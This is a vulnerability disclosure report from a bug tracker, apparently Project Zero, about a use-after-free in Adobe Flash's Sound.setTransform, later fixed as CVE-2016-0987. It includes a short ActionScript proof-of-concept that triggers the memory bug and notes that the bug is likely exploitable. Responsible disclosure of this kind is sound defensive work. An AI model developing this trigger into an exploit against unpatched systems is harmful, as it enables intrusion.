New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Mar 2016
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free in Sound.setTransform (2)
Project Member Reported by natashenka@google.com, Dec 18 2015 Back to list
There is a use-after-free in Sound.setTransform, similar to the one reported is  issue 568  (CVE-2015-8434). If the transform object provided is an integer primitive, and the Number constructor is overwritten, this constructor will be executed and can free the internal sound transform, which is then written to. A minimal proof-of-concept is as follows:

this.createEmptyMovieClip("my_mc", 1);
var my_sound:Sound = new Sound("my_mc");
_global.Number = func;
my_sound.attachSound("world");
my_sound.setTransform(7);
my_sound.start();

function func(){	
        my_mc.removeMovieClip();
	this.ll = 7; // actually construct a transform
        this.lr = 7;
        this.rl =7;
        this.rr = 7;
	}

A PoC is attached. This PoC demonstrates the bug by allocating a new transform in the place of the freed one, and reading the values that get overwritten. The test fails (Flash is vulnerable) if the number written to the screen is 9999. The test passes if any other value is written. There are roughly 600 object types in Flash that are the same size as the object that is used after it is freed, so I suspect this issue is exploitable with enough effort.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
soundtransform.fla
236 KB Download
soundtransform.swf
85.3 KB Download
Project Member Comment 1 by natashenka@google.com, Mar 22 2016
Labels: -Restrict-View-Commit CVE-2016-0987
Status: Fixed
Fixed in March update
Sign in to add a comment